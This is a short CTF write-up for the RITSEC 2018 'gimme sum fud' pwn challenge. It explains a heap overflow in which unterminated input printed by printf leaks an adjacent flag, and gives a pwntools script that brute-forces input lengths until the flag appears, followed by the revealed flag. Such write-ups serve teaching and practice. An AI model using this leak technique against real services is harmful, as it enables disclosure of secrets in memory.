Tags: pwn
Rating:
Full solution with steps taken is found [here](https://github.com/happysox/CTF_Writeups/tree/master/RITSEC_CTF_2018/gimme_sum_fud).
TLDR:
Heap overflow. User input and flag is placed on the heap. User input is refleced to stdout and isn't null terminated or bounds checked properly. It is therefore possible to merge the two strings in heap memory before `printf` is called on the user input.
**For the remote solution** I just bruteforced the offset between our input and the flag in memory.
```python
#!/usr/bin/python2
from pwn import *
recieved = ""
length = 0x400
with context.quiet:
while "SEC{" not in recieved and length < 0x700:
p = process('./pwn3')
#p = remote('fun.ritsec.club', 1338)
payload = "A"*(length-1)
p.sendlineafter('hangry...\n', payload)
recieved = p.recvall()
p.close()
length += 0x10
print recieved.split('\n')[1]
```
```
$ ./exploit.py
RITSEC{Muff1n_G0verFl0w_mmmm}
```